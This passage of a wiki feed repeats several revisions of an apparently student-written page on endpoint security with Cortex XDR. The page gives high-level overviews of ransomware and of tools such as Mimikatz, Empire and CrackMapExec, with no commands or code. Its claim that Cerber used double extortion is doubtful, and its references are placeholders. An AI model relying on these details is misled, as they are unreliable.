The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11282</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11282"/>
		<updated>2023-01-28T20:22:53Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Cerber Ransomware */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
==== WannaCry Ransomware ==== &lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Cortex XDR ====&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
==== Mimikatz ====&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
==== BC-Security / Empire ====&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Porchetta-Industries / CrackMapExec ====&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11280</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11280"/>
		<updated>2023-01-28T20:22:38Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Description */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
==== Cerber Ransomware ====&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
==== WannaCry Ransomware ==== &lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Cortex XDR ====&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
==== Mimikatz ====&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
==== BC-Security / Empire ====&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Porchetta-Industries / CrackMapExec ====&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11278</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11278"/>
		<updated>2023-01-28T20:21:47Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Ransomware */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
==== Cerber Ransomware ====&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
==== WannaCry Ransomware ==== &lt;br /&gt;
&lt;br /&gt;
